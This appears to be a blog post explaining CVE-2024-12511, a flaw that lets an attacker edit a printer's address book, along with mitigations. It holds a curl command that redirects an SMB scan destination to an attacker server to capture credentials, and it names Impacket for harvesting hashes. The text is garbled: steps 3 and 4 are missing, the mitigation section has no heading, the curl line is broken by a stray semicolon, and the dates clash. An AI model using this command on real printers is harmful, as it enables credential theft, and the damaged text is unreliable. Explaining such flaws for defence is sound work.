CVE-2024-12511 - Exploiting Printer Address Book For Credential Theft via SMB/FTP Redirection

---

[Last updated: June 2024]

Printers in modern offices do more than just print—they scan, store data, and communicate across networks. However, these features can also be an open door for attackers. CVE-2024-12511 is a fresh vulnerability that shows how, by sneaking into the printer's address book, an attacker can quietly hijack scan destinations and potentially grab user credentials.

This post explains the bug in plain English, shows an actual attack scenario, and shares best practices for patching and protecting your devices.

What Is CVE-2024-12511?

CVE-2024-12511 covers a weakness found in some network MFPs (multi-function printers). If an attacker gets access to the device’s address book—either from the web interface, a connected computer, or sometimes even from a permissive network—they can change entries like SMB or FTP scan destinations used by employees.

Why is that bad? When scans are sent using modified SMB or FTP settings, users might not notice. But the scans go to a server the attacker controls. If integrated authentication (like corporate usernames and passwords) is used, the attacker can capture valuable login credentials.

To use this CVE in real life, an attacker needs

- Access to the printer’s address book (directly or through credentials with address book editing rights).

Attack Workflow, Step by Step

1. Attacker logs into the printer’s web interface (default or weak password, insider access, or compromised endpoint).
2. Goes to Address Book/Contacts.

Waits for a user to scan a document using that address book entry.

5. Printer delivers the file—and possibly login credentials for the attacker’s server to authenticate the scan.

Code Example: Setting a Malicious SMB Destination

The example below uses cURL and shows how an attacker could automate changing a scan destination through a common printer HTTP API.

# Change address book SMB entry to attacker's server
curl -k -X POST "https://printer-ip-address/api/addressbook/edit"; \
-H "Content-Type: application/json" \
-d '{
  "entry_id": "5",
  "name": "Finance SMB Folder",
  "address_type": "SMB",
  "server": "attacker-server.local",
  "share_name": "stolen",
  "username": "CORP\\victimuser",
  "password": "VictimsPassword"
}'

*This code assumes the attacker has stolen credentials or is able to set a user (e.g., via phishing or default admin access). The specific API paths, fields, and authentication differ by brand/model.*

Real-World References

- CVE Database: CVE-2024-12511
- Printer security warning (example): HP Security Bulletin
- SMB credential capture via Scan2Folder attack: "Abusing Multifunction Printers for Internal Lateral Movement"
- Mitre reference: CVE-2024-12511 @ Mitre

How Credentials Get Stolen

When the scanner delivers a file to an SMB/FTP folder, authentication is usually required.

- SMB: The printer tries to log in with the provided username/password, sending them over the network (with or without encryption). If you set the printer to “send files as user” (so that scanned documents are accessible to the right people), it may use domain credentials every time.
- FTP: Similar—authentication details (sometimes in plain text) are sent to the attacker’s FTP server.

Security researchers have shown that fake Windows SMB servers (e.g., Impacket's SMB server) can easily capture hashes or clear passwords sent by printers.

Change default printer passwords (including “admin”).

- Restrict access to printer web interfaces to IT/admins only.

Update printer firmware to the latest security-patched version.

- Use unique scan credentials for printers—not user/domain accounts.

Monitor for changes in address book entries.

- Enable certificate validation on SMB/FTP connections where possible.

Exclusive Take: Why This Matters

CVE-2024-12511 is simple but powerful, and it’s not just theory. It’s common for attackers (and pentesters) to exploit shared printers as a stepping stone to the rest of the network—especially if they can nudge employees to scan a test page “for convenience.”

Unlike sophisticated malware, this attack needs almost no special hardware or software skills—just a bit of bad luck (or slack) with printer management.

Remember: Printers are computers. Treat them as you would any domain-joined endpoint.

Stay safe, patch early, and lock down your address books!

*For more, see the official NIST CVE-2024-12511 entry and your manufacturer’s latest firmware updates.*

Timeline

Published on: 02/03/2025 20:15:32 UTC